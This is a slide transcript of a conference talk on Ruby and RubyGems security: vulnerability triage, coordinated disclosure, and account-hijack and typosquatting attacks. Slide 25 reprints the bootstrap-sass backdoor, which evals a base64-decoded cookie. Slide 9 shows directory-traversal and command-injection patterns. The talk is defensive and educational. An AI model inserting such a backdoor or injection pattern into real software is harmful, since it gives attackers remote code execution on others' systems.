Successfully reported this slideshow.

Ruby Security the Hard Way

0

Share

Upcoming SlideShare
OSS Security the hard way
OSS Security the hard way
Loading in …3
×
1 of 36
1 of 36

More Related Content

Related Books

Free with a 14 day trial from Scribd

See all

Ruby Security the Hard Way

  1. 1. Hiroshi SHIBATA / GMO Pepabo, Inc. 2019.09.15 OsakaRubyKaigi02 Ruby Security The hard way
  2. 2. self.introduce
  3. 3. Executive Officer VP of Engineering Technical Director at GMO Pepabo, Inc. @pepabo Hiroshi SHIBATA @hsbt https://www.hsbt.org
  4. 4. 一緒にもっと面白くしませんか? 最新の採用情報をチェック→ @pb_recruit 新卒採用ページをチェック→ https://recruit.pepabo.com/info/graduate/
  5. 5. • What’s vulnerability? • Workflow for security release • RubyGems.org Agenda
  6. 6. What’s vulnerability? 1.
  7. 7. • Consider Attack Surface and Attack Vector • Can attack by anonymous? Triage policy for vulnerability Attack Surface Software/System Attack Surface Attack Vector Attack Vector Attack Vector Attacker
  8. 8. • How effect to CIA • Confidentiality • Integrity • Availability • The decision of other language and libraries • We always refer Python and Go and others Triage policy for vulnerability
  9. 9. • Directory Traversal • OS command injection • Vulnerability of bundled code like libffi or libyaml. • Elevation of Privilege Accepted Case Tempfile.create("/../../home/vagrant/blue") {|f| p f.path} if localfile f = open(localfile, “w") # Vulnerable code here. open("| os command","w") elsif !block_given? result = String.new end
  10. 10. • DirectoryIndex • SSL & Certification • Expected eval case Rejected Case
  11. 11. • The potential vulnerability discovered by ASAN • SEGV Complex case
  12. 12. Workflow for security release 2.
  13. 13. • Mail (security@ruby-lang.org) or HackerOne Receive report https://hackerone.com/ruby
  14. 14. • What’s vulnerable? • Description • PoC • Impact Triage
  15. 15. • Resolve the vulnerability with private • Discuss with the original reporter • Avoid the another vulnerability Code
  16. 16. • Distribution maintener, Service Provider • Other implementation like JRuby, TruffleRuby • Release date • We ignore to release at Friday and weekend • Assign CVE • Announcement • We should write a formal information for disclosing vulnerability Coordinate
  17. 17. • “The Identify number for the potential vulnerability issue” • That’s all. It’s not impact or authority What’s CVE
  18. 18. We are working with 3+ people because the branch maintainers are different people. Release
  19. 19. • We always coordinate to disclose vulnerability to the original reporter. • The reports should coordinate to us too. Disclose
  20. 20. Unexpected disclosure case https://nishiohirokazu.hatenadiary.org/entry/20100819/1282200581
  21. 21. • We only set the bug bounty on HackerOne, not mail. • It’s provided by IBB What's bug bounty https://internetbugbounty.org
  22. 22. • The configuration of AWS S3 • The configurations of CDN or PaaS • The configuration of GitHub • Copy and Paste Web page and spam report • Copy and Paste the old CVE report • … Noise Problem
  23. 23. RubyGems.org 3.
  24. 24. • Account hijack • rest-client, bootstrap-sass, strong_password • They are completely malicious case • Typo squatting • active-support, bandler, capistrano-colors • It’s contained the fake gem by the security researchers Recent attacks
  25. 25. https://snyk.io/blog/malicious-remote-code-execution- backdoor-discovered-in-the-popular-bootstrap-sass-ruby-gem/ The code injection with Rack begin require 'rack/sendfile' if Rails.env.production? Rack::Sendfile.tap do |r| r.send :alias_method, :c, :call r.send(:define_method, :call) do |e| begin x = Base64.urlsafe_decode64(e['http_cookie'.upcase].scan(/___cfduid=(.+);/).flatten[0].to_s) eval(x) if x rescue Exception end c(e) end end end rescue Exception nil end
  26. 26. • RubyGems have the hooks for `gem install` • Also have hook for native extension Code injection for `gem install` Gem.pre_install do |installer| puts “All your base are belong to us” end Gem.post_install do |installer| puts “All your base are belong to us” end
  27. 27. rubygems.org was attacked with pawned password. https://news.ycombinator.com/item?id=20745768 Why your account was hijacked? “My RubyGems.org account was using an insecure, reused password that has leaked to the internet in other breaches."
  28. 28. What can we do?
  29. 29. Do not re-use your password
  30. 30. Use the strong password (prefer 22+ chars)
  31. 31. Prepare two factor authentication With RubyGems 3
  32. 32. • “Notify the all owners when gem pushed”(done!) What’s do rubygems.org?(1) • “Integrate GitHub commits” • GitHub is not the central in the world :) • BitBucket, GitLab, and your git sever is vulnerable?
  33. 33. Added Webauthn feature(!!1) What’s do rubygems.org?(2)
  34. 34. Wrap-up
  35. 35. Do not re-use your password Use the strong password (prefer 22+ chars) Prepare two factor authentication With RubyGems 3

×